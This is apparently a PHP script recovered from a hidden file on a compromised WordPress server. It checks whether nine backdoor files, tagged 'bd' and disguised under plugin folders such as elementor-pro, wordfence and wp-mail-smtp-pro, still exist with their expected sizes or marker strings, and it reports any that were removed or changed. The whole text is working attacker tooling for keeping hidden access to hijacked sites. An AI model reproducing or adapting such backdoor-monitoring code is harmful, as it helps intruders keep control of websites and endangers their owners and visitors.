File: //dev/shm/.item
<?php $r = '/home/reallldo/public_html'; $x = ["/wp-content/plugins/wp-mail-smtp-pro/vendor_prefixed/aws/aws-sdk-php/src/Api/Parser/tpl.inc.php"=>"bd@@1798@@660",
"/wp-content/plugins/elementor-pro/modules/forms/submissions/database/entities/form.snapshot.php"=>"bd@@1801@@617",
"/wp-content/plugins/wp-mail-smtp-pro/vendor_prefixed/google/apiclient/src/Task/statistics_user.php"=>"bd@@1809@@631",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php"=>"bd@@539@@data_storage",
"/wp-content/plugins/elementor-pro/core/app/modules/import-export/runners/revert/editprefs.php"=>"bd@@567@@669",
"/wp-content/plugins/elementor-pro/vendor_prefixed/php-di/phpdoc-reader/src/PhpDocReader/PhpParser/chrome_new.php"=>"bd@@572@@624",
"/wp-content/plugins/easy-wp-smtp/vendor/woocommerce/action-scheduler/classes/data-stores/ActionScheduler.wpCommentLogger.php"=>"bd@@600@@1666",
"/wp-content/plugins/contact_1756875124/connents.php"=>"bd@@139@@956",
"/wp-content/plugins/breeze/vendor-extra/mobiledetect/php8/vendor/mobiledetect/mobiledetectlib/src/Exception/cache_ranks.php"=>"bd@@1786@@676"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');